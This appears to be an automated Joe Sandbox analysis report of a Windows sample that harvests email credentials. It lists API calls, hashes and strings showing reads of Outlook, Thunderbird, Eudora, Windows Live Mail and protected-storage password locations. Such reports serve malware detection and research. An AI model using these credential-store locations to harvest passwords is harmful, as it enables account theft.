                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                          • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                          Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00401E8B
                            • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                          • strlen.MSVCRT ref: 00401EA4
                          • strlen.MSVCRT ref: 00401EB2
                          • strlen.MSVCRT ref: 00401EF8
                          • strlen.MSVCRT ref: 00401F06
                          • memset.MSVCRT ref: 00401FB1
                          • atoi.MSVCRT ref: 00401FE0
                          • memset.MSVCRT ref: 00402003
                          • sprintf.MSVCRT ref: 00402030
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • memset.MSVCRT ref: 00402086
                          • memset.MSVCRT ref: 0040209B
                          • strlen.MSVCRT ref: 004020A1
                          • strlen.MSVCRT ref: 004020AF
                          • strlen.MSVCRT ref: 004020E2
                          • strlen.MSVCRT ref: 004020F0
                          • memset.MSVCRT ref: 00402018
                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                          • _mbscpy.MSVCRT ref: 00402177
                          • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileFolderPathSpecialStrings_mbscatatoisprintf
                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                          • API String ID: 52128907-4223776976
                          • Opcode ID: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                          • Opcode Fuzzy Hash: 0586a96bd1dd566e4e6b01723853c75a2a65919309edaf857d44129f31cda3b9
                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                          Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00402869
                            • Part of subcall function 004029A2: RegQueryValueExA.KERNEL32(00000400,?,00000000,?,?,?), ref: 004029D3
                          • _mbscpy.MSVCRT ref: 004028A3
                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                          • _mbscpy.MSVCRT ref: 0040297B
                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                          • API String ID: 1497257669-167382505
                          • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                          • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                          • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                          • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                          Function 0040CF44 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 169COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                          • DeleteObject.GDI32(?), ref: 0040D1A6
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                          • API String ID: 745651260-375988210
                          • Opcode ID: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                          • Opcode Fuzzy Hash: 281cc72733d93a48e74a4e104f31179254ddf1e53b96f5d983554f03d68ac606
                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                          Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                          • LoadLibraryA.KERNEL32(pstorec.dll), ref: 00403C35
                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                          • _mbscpy.MSVCRT ref: 00403E54
                          Strings
                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                          • pstorec.dll, xrefs: 00403C30
                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                          • PStoreCreateInstance, xrefs: 00403C44
                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadProc_mbscpy
                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                          • API String ID: 1197458902-317895162
                          • Opcode ID: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                          • Opcode Fuzzy Hash: 7553cdf7f2ce1cf444f62a1d2691c4a3b1dbf44d811f574412da19563fe3f526
                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                          Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 261 444c4a-444c66 call 444e38 GetModuleHandleA 264 444c87-444c8a 261->264 265 444c68-444c73 261->265 267 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 264->267 265->264 266 444c75-444c7e 265->266 269 444c80-444c85 266->269 270 444c9f-444ca3 266->270 275 444d02-444d0d __setusermatherr 267->275 276 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 267->276 269->264 273 444c8c-444c93 269->273 270->264 271 444ca5-444ca7 270->271 274 444cad-444cb0 271->274 273->264 277 444c95-444c9d 273->277 274->267 275->276 280 444da4-444da7 276->280 281 444d6a-444d72 276->281 277->274 282 444d81-444d85 280->282 283 444da9-444dad 280->283 284 444d74-444d76 281->284 285 444d78-444d7b 281->285 287 444d87-444d89 282->287 288 444d8b-444d9c GetStartupInfoA 282->288 283->280 284->281 284->285 285->282 286 444d7d-444d7e 285->286 286->282 287->286 287->288 289 444d9e-444da2 288->289 290 444daf-444db1 288->290 291 444db2-444dc6 GetModuleHandleA call 40cf44 289->291 290->291 294 444dcf-444e0f _cexit call 444e71 291->294 295 444dc8-444dc9 exit 291->295 295->294
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                          • String ID: 2t
                          • API String ID: 3662548030-3527913779
                          • Opcode ID: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                          • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                          • Opcode Fuzzy Hash: a2c5e685021b953e45b16df810cc3e629d637f1bb2461c548f2803c140be0595
                          • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                          Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 299 40fb00-40fb35 call 44b090 RegOpenKeyExA 302 40fc37-40fc3d 299->302 303 40fb3b-40fb4f RegOpenKeyExA 299->303 304 40fb55-40fb7e RegQueryValueExA 303->304 305 40fc2d-40fc31 RegCloseKey 303->305 306 40fc23-40fc27 RegCloseKey 304->306 307 40fb84-40fb93 call 404734 304->307 305->302 306->305 307->306 310 40fb99-40fbd1 call 4047a5 307->310 310->306 313 40fbd3-40fbdb 310->313 314 40fc19-40fc1d LocalFree 313->314 315 40fbdd-40fc14 memcpy * 2 call 40f802 313->315 314->306 315->314
                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                          • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                          • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • memcpy.MSVCRT ref: 0040FBE4
                          • memcpy.MSVCRT ref: 0040FBF9
                            • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                            • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                            • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                            • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                          • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                          • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                          • API String ID: 2768085393-2409096184
                          • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                          • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                          • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                          • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                          Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00402C9D
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • memset.MSVCRT ref: 00402CF7
                          • sprintf.MSVCRT ref: 00402D10
                          • sprintf.MSVCRT ref: 00402D4E
                            • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                            • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Closememset$sprintf$EnumOpen
                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                          • API String ID: 1831126014-3814494228
                          • Opcode ID: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                          • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                          • Opcode Fuzzy Hash: b1494c850d96e19dfebe9b6e5b972ea39351de22b51df2d3807edb00f3b2aba3
                          • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                          Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0044430B
                            • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                            • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                          • memset.MSVCRT ref: 00444379
                          • memset.MSVCRT ref: 00444394
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                          • strlen.MSVCRT ref: 004443DB
                          • _strcmpi.MSVCRT ref: 00444401
                          Strings
                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                          • \Microsoft\Windows Mail, xrefs: 00444329
                          • Store Root, xrefs: 004443A5
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                          • API String ID: 1502082548-2578778931
                          • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                          • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                          Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 363 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 368 40f5c3-40f5ea RegQueryValueExA 363->368 369 40f6d9-40f6df 363->369 370 40f6d0-40f6d3 RegCloseKey 368->370 371 40f5f0-40f5f4 368->371 370->369 371->370 372 40f5fa-40f604 371->372 373 40f606-40f618 call 40466b call 404734 372->373 374 40f677 372->374 384 40f66a-40f675 call 404785 373->384 385 40f61a-40f63e call 4047a5 373->385 376 40f67a-40f67d 374->376 376->370 377 40f67f-40f6bf call 4012ee RegQueryValueExA 376->377 377->370 383 40f6c1-40f6cf 377->383 383->370 384->376 385->384 390 40f640-40f643 385->390 391 40f661-40f664 LocalFree 390->391 392 40f645-40f65a memcpy 390->392 391->384 392->391
                          APIs
                          • memset.MSVCRT ref: 0040F567
                          • memset.MSVCRT ref: 0040F57F
                            • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                          • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                            • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                          • memcpy.MSVCRT ref: 0040F652
                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                          • String ID:
                          • API String ID: 2012582556-3916222277
                          • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                          • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                          • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                          • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                          Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 393 4037ca-40381c memset * 2 call 444551 396 4038e2-4038e5 393->396 397 403822-403882 call 4021b6 call 406f06 * 2 strchr 393->397 404 403884-403895 _mbscpy 397->404 405 403897-4038a2 strlen 397->405 406 4038bf-4038dd _mbscpy call 4023e5 404->406 405->406 407 4038a4-4038bc sprintf 405->407 406->396 407->406
                          APIs
                          • memset.MSVCRT ref: 004037EB
                          • memset.MSVCRT ref: 004037FF
                            • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                            • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                          • strchr.MSVCRT ref: 0040386E
                          • _mbscpy.MSVCRT ref: 0040388B
                          • strlen.MSVCRT ref: 00403897
                          • sprintf.MSVCRT ref: 004038B7
                          • _mbscpy.MSVCRT ref: 004038CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                          • String ID: %s@yahoo.com
                          • API String ID: 317221925-3288273942
                          • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                          • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                          • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                          • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                          Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 409 404a99-404ac2 LoadLibraryA 410 404ac4-404ad2 GetProcAddress 409->410 411 404aec-404af4 409->411 412 404ad4-404ad8 410->412 413 404add-404ae6 FreeLibrary 410->413 416 404af5-404afa 411->416 417 404adb 412->417 413->411 415 404ae8-404aea 413->415 415->416 418 404b13-404b17 416->418 419 404afc-404b12 MessageBoxA 416->419 417->413
                          APIs
                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                          • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                          • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                          • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                          Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 420 4036e5-4036f5 421 4037c6-4037c7 420->421 422 4036fb-403709 call 410863 420->422 424 40370e-403710 422->424 425 4037c5 424->425 426 403716-40372a strchr 424->426 425->421 426->425 427 403730-403787 call 4021b6 _mbscpy * 2 strlen 426->427 430 4037a4-4037c0 _mbscpy call 4023e5 427->430 431 403789-4037a1 sprintf 427->431 430->425 431->430
                          APIs
                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                            • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                            • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                          • strchr.MSVCRT ref: 0040371F
                          • _mbscpy.MSVCRT ref: 00403748
                          • _mbscpy.MSVCRT ref: 00403758
                          • strlen.MSVCRT ref: 00403778
                          • sprintf.MSVCRT ref: 0040379C
                          • _mbscpy.MSVCRT ref: 004037B2
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                          • String ID: %s@gmail.com
                          • API String ID: 3261640601-4097000612
                          • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                          • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                          Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 433 4034e4-403544 memset * 2 call 410b1e 436 403580-403582 433->436 437 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 433->437 437->436
                          APIs
                          • memset.MSVCRT ref: 00403504
                          • memset.MSVCRT ref: 0040351A
                            • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                          • _mbscpy.MSVCRT ref: 00403555
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 0040356D
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
